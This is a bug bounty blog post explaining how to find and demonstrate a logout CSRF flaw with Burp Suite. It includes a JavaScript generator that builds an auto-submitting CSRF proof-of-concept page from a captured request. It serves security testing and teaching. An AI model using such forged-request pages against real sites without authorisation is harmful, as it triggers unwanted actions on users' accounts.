BUG POC

BUG POC -> CSRF Leads to Logout Users


Hello Hackers,

Let’s read some Cybersecurity Blogs…

Today we will look at a bug I recently found on a private bug bounty program; let’s call it https://example.com.

The vulnerability was CSRF (Cross-Site Request Forgery). Most people only think of CSRF against the password-change function, but any request that changes state on the server is a candidate, for example:

  • Password change function
  • Logout function
  • Email address change function
  • Phone number change function
  • Money transfer, etc.

The test starts with the login functionality. First, log in to an account you control (the attacker’s account), turn on Intercept in the Proxy tab of Burp Suite, and then click Log out.

Once you click the “Logout” button, Burp Suite captures the request.

This is the intercepted logout request. Look at what it contains: if it is a GET, or a POST that carries no anti-CSRF token (or one the server does not validate), nothing stops another site from making the victim’s browser send it. Next we build a CSRF PoC that sends that same request from the victim’s browser.

Now someone will say that a CSRF token protects this. Yes, I agree: the standard patch for CSRF is a per-session anti-CSRF token that the server validates on every state-changing request.

But the token is often misconfigured, which is very beneficial to attackers: it is only checked when the client happens to send it, it is not bound to the user’s session (so a token from the attacker’s own session passes), or the endpoint also accepts a GET that skips the check entirely. Any one of these leaves the function exploitable.

Now we move on. With the request intercepted, right-click it (or use the Action button above the request) to create the CSRF PoC:

Action -> Engagement tools -> Generate CSRF PoC

(The CSRF PoC generator is a Burp Suite Professional feature.) When you click Generate CSRF PoC, a new Burp window opens containing the generated HTML. Copy that HTML.

Paste the HTML into a text editor. It is a small page with a form whose action is the logout URL, a hidden input for each parameter of the captured request, and a submit button.

Save the file with an .html extension, for example poc.html.

With the file saved, log in to a second account in a different browser (or browser profile); this account plays the victim.

Open poc.html in the browser where the victim account is logged in. You will see a page with a single submit button, or something slightly different depending on the generated form.

Click the submit button, then refresh the account page: the victim has been logged out.
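The whole procedure above, as an added example that is neither the post’s own PoC nor Burp’s generator code: a small parser for a raw intercepted request followed by a generator that emits the kind of HTML Burp produces (a form with hidden inputs and a submit button, optionally auto-submitting). The captured logout request is constructed here, with example.com standing in for the private program as in the post, and the https scheme is an assumption since the raw request line does not carry one.

```javascript
// Added example, not the post's PoC and not Burp's code: parse a raw request
// as shown in Burp's intercept window, then build a CSRF PoC page from it.
// The captured request below is constructed; example.com is the post's
// placeholder host, and the https scheme is assumed.

// Parse a raw HTTP/1.1 request into the parts a PoC needs. Only query strings
// and application/x-www-form-urlencoded bodies are handled, which is exactly
// what a plain HTML form can reproduce cross-site.
function parseRawRequest(raw) {
  const [head, body = ""] = raw.split(/\r?\n\r?\n/, 2);
  const lines = head.split(/\r?\n/);
  const [method, target] = lines[0].split(" ");
  const headers = {};
  for (const line of lines.slice(1)) {
    const i = line.indexOf(":");
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  // For GET the parameters live in the query string; the form re-adds them.
  const [path, query = ""] = target.split("?", 2);
  const params = {};
  for (const [k, v] of new URLSearchParams(method === "GET" ? query : body)) params[k] = v;
  return { method: method.toUpperCase(), url: `https://${headers.host}${path}`, params };
}

// Attribute-safe escaping so a captured value cannot break out of the form.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  }[c]));
}

// Build the PoC page: a form targeting the captured URL, one hidden input per
// parameter, a submit button, and (optionally) a script that submits it on load.
function buildCsrfPoc(captured, { autoSubmit = false } = {}) {
  const method = captured.method.toUpperCase();
  if (method !== "GET" && method !== "POST") {
    throw new Error("HTML forms can only send GET or POST");
  }
  const inputs = Object.entries(captured.params)
    .map(([k, v]) => `      <input type="hidden" name="${escapeHtml(k)}" value="${escapeHtml(v)}" />`)
    .join("\n");
  const submit = autoSubmit ? "    <script>document.forms[0].submit();</script>" : "";
  return `<html>
  <body>
    <form action="${escapeHtml(captured.url)}" method="${method}">
${inputs}
      <input type="submit" value="Submit request" />
    </form>
${submit}
  </body>
</html>`;
}

// Constructed stand-in for the intercepted logout request (cookie redacted).
const capturedLogout = [
  "POST /logout HTTP/1.1",
  "Host: example.com",
  "Cookie: session=REDACTED",
  "Content-Type: application/x-www-form-urlencoded",
  "Content-Length: 13",
  "",
  "action=logout",
].join("\r\n");

const pocHtml = buildCsrfPoc(parseRawRequest(capturedLogout));
```

Write `pocHtml` to poc.html and open it in the victim’s browser; the button-only version matches what the post describes, and `autoSubmit: true` removes the click. The browser sends the victim’s cookie with the submission only if that cookie is allowed cross-site, so check the Set-Cookie SameSite attribute before spending time on the report.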

Boom!! You have achieved success and found a low-severity bug, which can pay up to $200. Logout CSRF is rated low (and many programs list it as out of scope) because the impact is limited to annoying the victim, so check the program’s scope before reporting it.

That’s it for today; time to say goodbye for now.

Happy Hacking!!

4 comments

  1. Did you report this on HackerOne?
    I reported this POC to many programs, but HackerOne rejected this bug.
    Would you share your report on the HackerOne website?
    Thanks

  2. I feel that you’re on the right course with your blog site. You’ve got a considerable amount of fascinating material that new viewers may enjoy.
